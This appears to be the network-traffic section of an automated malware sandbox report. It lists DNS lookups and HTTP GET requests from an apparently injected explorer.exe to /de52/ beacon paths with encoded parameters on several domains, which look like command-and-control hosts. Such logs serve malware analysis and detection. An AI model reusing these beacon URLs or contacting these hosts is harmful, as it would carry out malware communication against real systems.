                                                                                                          Jun 22, 2021 18:06:46.851532936 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851547956 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851572037 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851577997 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851619959 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851620913 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851664066 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851669073 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851701975 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851710081 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851744890 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851748943 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851784945 CEST804977835.209.88.35192.168.2.4
                                                                                                          Jun 22, 2021 18:06:46.851797104 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:46.851834059 CEST4977880192.168.2.435.209.88.35
                                                                                                          Jun 22, 2021 18:06:51.793962002 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.837032080 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.837265015 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.837527990 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.880568027 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.976614952 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.976666927 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.976871967 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.976931095 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:52.020415068 CEST804977934.102.136.180192.168.2.4

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 22, 2021 18:04:51.640705109 CEST53530978.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:52.553347111 CEST4925753192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:52.606376886 CEST53492578.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:53.506577015 CEST6238953192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:53.565637112 CEST53623898.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:55.021409988 CEST4991053192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:55.080760002 CEST53499108.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:56.199162006 CEST5585453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:56.258557081 CEST53558548.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:57.458127975 CEST6454953192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:57.508827925 CEST53645498.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:58.353847027 CEST6315353192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:58.404939890 CEST53631538.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:04:59.418277025 CEST5299153192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:04:59.474721909 CEST53529918.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:00.341372013 CEST5370053192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:00.397557974 CEST53537008.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:01.455554008 CEST5172653192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:01.505968094 CEST53517268.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:02.371608019 CEST5679453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:02.425209999 CEST53567948.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:03.662364006 CEST5653453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:03.714626074 CEST53565348.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:04.825570107 CEST5662753192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:04.878463984 CEST53566278.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:07.260529995 CEST5662153192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:07.311386108 CEST53566218.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:08.398658037 CEST6311653192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:08.458273888 CEST53631168.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:09.705202103 CEST6407853192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:09.755305052 CEST53640788.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:10.919406891 CEST6480153192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:10.975267887 CEST53648018.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:11.858045101 CEST6172153192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:11.927227974 CEST53617218.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:13.032439947 CEST5125553192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:13.091696024 CEST53512558.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:15.475276947 CEST6152253192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:15.528253078 CEST53615228.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:21.818195105 CEST5233753192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:21.894490957 CEST53523378.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:39.818063021 CEST5504653192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:40.033080101 CEST53550468.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:40.850999117 CEST4961253192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:40.912467003 CEST53496128.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:41.527678013 CEST4928553192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:41.769505978 CEST53492858.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:42.216876030 CEST5060153192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:42.284393072 CEST53506018.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:42.697580099 CEST6087553192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:42.767492056 CEST53608758.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:42.921756029 CEST5644853192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:42.983896017 CEST53564488.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:43.520226002 CEST5917253192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:43.582356930 CEST53591728.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:44.099085093 CEST6242053192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:44.161602020 CEST53624208.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:45.026206017 CEST6057953192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:45.086499929 CEST53605798.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:46.051551104 CEST5018353192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:46.110084057 CEST53501838.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:46.622945070 CEST6153153192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:46.688252926 CEST53615318.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:46.922976971 CEST4922853192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:46.975034952 CEST53492288.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:57.109780073 CEST5979453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:57.184031963 CEST53597948.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:05:58.313008070 CEST5591653192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:05:58.376924038 CEST53559168.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:02.382002115 CEST5275253192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:02.443214893 CEST53527528.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:25.780879021 CEST6054253192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:25.839808941 CEST53605428.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:28.525279045 CEST6068953192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:28.711617947 CEST53606898.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:29.494532108 CEST6420653192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:29.569048882 CEST53642068.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:31.182023048 CEST5090453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:31.248929977 CEST53509048.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:34.154006004 CEST5752553192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST53575258.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:39.529205084 CEST5381453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:39.600775003 CEST53538148.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:45.072633028 CEST5341853192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:46.067790985 CEST5341853192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:46.367737055 CEST53534188.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:47.354382992 CEST53534188.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.717861891 CEST6283353192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:51.792109966 CEST53628338.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:06:56.999191999 CEST5926053192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:06:57.062167883 CEST53592608.8.8.8192.168.2.4
                                                                                                          Jun 22, 2021 18:07:02.257379055 CEST4994453192.168.2.48.8.8.8
                                                                                                          Jun 22, 2021 18:07:02.320333958 CEST53499448.8.8.8192.168.2.4

                                                                                                          ICMP Packets

                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Jun 22, 2021 18:06:47.354677916 CEST192.168.2.48.8.8.8d00f(Port unreachable)Destination Unreachable

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Jun 22, 2021 18:05:57.109780073 CEST192.168.2.48.8.8.80xe467Standard query (0)www.collectordrive.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:02.382002115 CEST192.168.2.48.8.8.80xc6eeStandard query (0)www.ty-valve.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:25.780879021 CEST192.168.2.48.8.8.80xefcStandard query (0)www.ty-valve.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:28.525279045 CEST192.168.2.48.8.8.80x722bStandard query (0)www.dietsz.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.154006004 CEST192.168.2.48.8.8.80x1237Standard query (0)www.gangju123.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:39.529205084 CEST192.168.2.48.8.8.80x8a88Standard query (0)www.ayanmobile.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:45.072633028 CEST192.168.2.48.8.8.80xc82Standard query (0)www.securenotifications.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:46.067790985 CEST192.168.2.48.8.8.80xc82Standard query (0)www.securenotifications.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:51.717861891 CEST192.168.2.48.8.8.80x534Standard query (0)www.cuttingemporium.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:56.999191999 CEST192.168.2.48.8.8.80x598aStandard query (0)www.optimismactivism.comA (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:07:02.257379055 CEST192.168.2.48.8.8.80xd849Standard query (0)www.occasionalassistant.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Jun 22, 2021 18:05:57.184031963 CEST8.8.8.8192.168.2.40xe467No error (0)www.collectordrive.comcollectordrive.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 22, 2021 18:05:57.184031963 CEST8.8.8.8192.168.2.40xe467No error (0)collectordrive.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:02.443214893 CEST8.8.8.8192.168.2.40xc6eeNo error (0)www.ty-valve.com192.155.181.250A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:25.839808941 CEST8.8.8.8192.168.2.40xefcNo error (0)www.ty-valve.com192.155.181.250A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:28.711617947 CEST8.8.8.8192.168.2.40x722bNo error (0)www.dietsz.com208.91.197.91A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)www.gangju123.comparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:34.230094910 CEST8.8.8.8192.168.2.40x1237No error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:39.600775003 CEST8.8.8.8192.168.2.40x8a88No error (0)www.ayanmobile.comayanmobile.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:39.600775003 CEST8.8.8.8192.168.2.40x8a88No error (0)ayanmobile.com160.153.78.1A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:46.367737055 CEST8.8.8.8192.168.2.40xc82No error (0)www.securenotifications.com35.209.88.35A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:47.354382992 CEST8.8.8.8192.168.2.40xc82No error (0)www.securenotifications.com35.209.88.35A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:51.792109966 CEST8.8.8.8192.168.2.40x534No error (0)www.cuttingemporium.comcuttingemporium.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:51.792109966 CEST8.8.8.8192.168.2.40x534No error (0)cuttingemporium.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:57.062167883 CEST8.8.8.8192.168.2.40x598aNo error (0)www.optimismactivism.comoptimismactivism.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 22, 2021 18:06:57.062167883 CEST8.8.8.8192.168.2.40x598aNo error (0)optimismactivism.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                          Jun 22, 2021 18:07:02.320333958 CEST8.8.8.8192.168.2.40xd849No error (0)www.occasionalassistant.comoccasionalassistant.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 22, 2021 18:07:02.320333958 CEST8.8.8.8192.168.2.40xd849No error (0)occasionalassistant.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • www.collectordrive.com
                                                                                                          • www.dietsz.com
                                                                                                          • www.gangju123.com
                                                                                                          • www.ayanmobile.com
                                                                                                          • www.securenotifications.com
                                                                                                          • www.cuttingemporium.com
                                                                                                          • www.optimismactivism.com
                                                                                                          • www.occasionalassistant.com

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.44976534.102.136.18080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:05:57.232847929 CEST2490OUTGET /de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.collectordrive.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:05:57.373182058 CEST2491INHTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:05:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60cf306c-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.449773208.91.197.9180C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:06:28.881365061 CEST6965OUTGET /de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.dietsz.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:06:29.140470028 CEST6966INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 22 Jun 2021 16:06:28 GMT
                                                                                                          Server: Apache
                                                                                                          Set-Cookie: vsid=927vr3719235890014433; expires=Sun, 21-Jun-2026 16:06:28 GMT; Max-Age=157680000; path=/; domain=www.dietsz.com; HttpOnly
                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Uw4qiUju2zz+weO4mV2Gl7k1nX7kTZn8uaqVZARtigLqyAUX38aGdpukBvac52fhLQzpcbQQJ2UWrAn9Fd/c7g==
                                                                                                          Content-Length: 2548
                                                                                                          Keep-Alive: timeout=5, max=84
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 65 74 73 7a 2e 63 6f 6d 2f 3f 66 70 3d 30 6c 64 30 74 25 32 42 4a 57 68 52 6b 38 57 64 56 54 50 47 50 4c 39 42 41 67 49 4f 6d 69 74 33 46 6f 79 4e 4c 33 46 37 50 47 25 32 46 70 4f 72 50 57 53 35 41 48 70 4c 72 4d 79 76 50 39 59 4f 33 77 70 61 51 59 63 76 36 79 56 53 42 43 58 32 70 68 63 4b 38 45 67 69 64 67 45 58 63 47 46 66 62 50 73 77 25 32 46 62 56 48 39 4b 7a 34 74 43 68 45 6e 77 30 49 38 56 71 71 6a 58 78 6e 4d 70 6d 6a 55 4f 62 69 37 4b 4b 76 54 68 51 73 35 77 52 69 4d 74 39 52 45 52 41 76 33 4e 78 55 32 73 4f 58 54 49 31 68 71 5a 4c 4c 44 55 4c 31 52 4f 49 25 33 44 26 70 72 76 74 6f 66 3d 35 4e 56 34 63 61 69 72 79 58 49 36 68 37 66 34 36 4d 39 25 32 46 74 25 32 42 39 58 48 36 65 78 70 6a 74 49 52 70 62 37 39 6a 5a 37 76 72 55 25 33 44 26 70 6f 72 75 3d 66 64 52 62 7a 77 45 45 57 6b 67 68 41 38 49 48 78 57 6b 78 63 76 68 5a 37 55 71 4b 53 72 75 50 76 6e 57 48 68 38 41 6a 57 62 72 59 48 4d 37 25 32 42 45 32 6f 41 6a 53 4d 25 32 42 46 55 51 68 31 6e 53 74 55 25 32 46 4f 64 4a 7a 6c 75 71 77 77 45 44 52 6b 36 43 6a 75 57 57 7a 32 59 79 6b 6a 44 4c 75 58 25 32 42 57 48 78 31 43 58 73 65 74 72 35 61 52 4e 74 75 6f 65 77 56 71 31 34 74 67 47 70 52 72 47 4a 32 42 6f 75 4b 49 75 6a 6e 7a 78 75 61 6e 7a 4a 4d 53 37 46 34 6f 63 76 78 33 48 31 58 7a 4e 65 38 75 6d 63 6c 51 69 75 79 6a 50 76 6f 54 6c 58 57 39 25 32 42 4a 47 56 76 71 73 46 75 6f 4e 74 36 51 38 26 63 69 66 72 3d 31 26 7a 36 41 64 5f 38 4a 70 3d 6a 62 59 38 6d 6f 74 58 4d 4a 58 6a 4a 72 51 34 53 65 79 6a 52 2b 46 6a 52 63 6c 52 69 31 6d 4a 38 64 42 41 53 77 55 4f 38 6a 4c 57 4c 35 25 32 46 46 46 49 76 57 6a 53 38 72 6d 51 74 68 50 70 6c 50 75 4b 71 56 26 59 7a 3d 30 62 70 44 79 54 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 55 77 34 71 69 55 6a 75 32 7a 7a 2b
                                                                                                          Data Ascii: ...top.location="http://www.dietsz.com/?fp=0ld0t%2BJWhRk8WdVTPGPL9BAgIOmit3FoyNL3F7PG%2FpOrPWS5AHpLrMyvP9YO3wpaQYcv6yVSBCX2phcK8EgidgEXcGFfbPsw%2FbVH9Kz4tChEnw0I8VqqjXxnMpmjUObi7KKvThQs5wRiMt9RERAv3NxU2sOXTI1hqZLLDUL1ROI%3D&prvtof=5NV4cairyXI6h7f46M9%2Ft%2B9XH6expjtIRpb79jZ7vrU%3D&poru=fdRbzwEEWkghA8IHxWkxcvhZ7UqKSruPvnWHh8AjWbrYHM7%2BE2oAjSM%2BFUQh1nStU%2FOdJzluqwwEDRk6CjuWWz2YykjDLuX%2BWHx1CXsetr5aRNtuoewVq14tgGpRrGJ2BouKIujnzxuanzJMS7F4ocvx3H1XzNe8umclQiuyjPvoTlXW9%2BJGVvqsFuoNt6Q8&cifr=1&z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5%2FFFIvWjS8rmQthPplPuKqV&Yz=0bpDyT";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Uw4qiUju2zz+


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.449776107.161.23.20480C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:06:34.372102976 CEST6987OUTGET /de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.gangju123.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:06:34.511514902 CEST6988INHTTP/1.1 302 Moved Temporarily
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 22 Jun 2021 16:06:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 154
                                                                                                          Connection: close
                                                                                                          Location: http://www.gangju123.com?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.449777160.153.78.180C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:06:39.786784887 CEST6989OUTGET /de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.ayanmobile.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
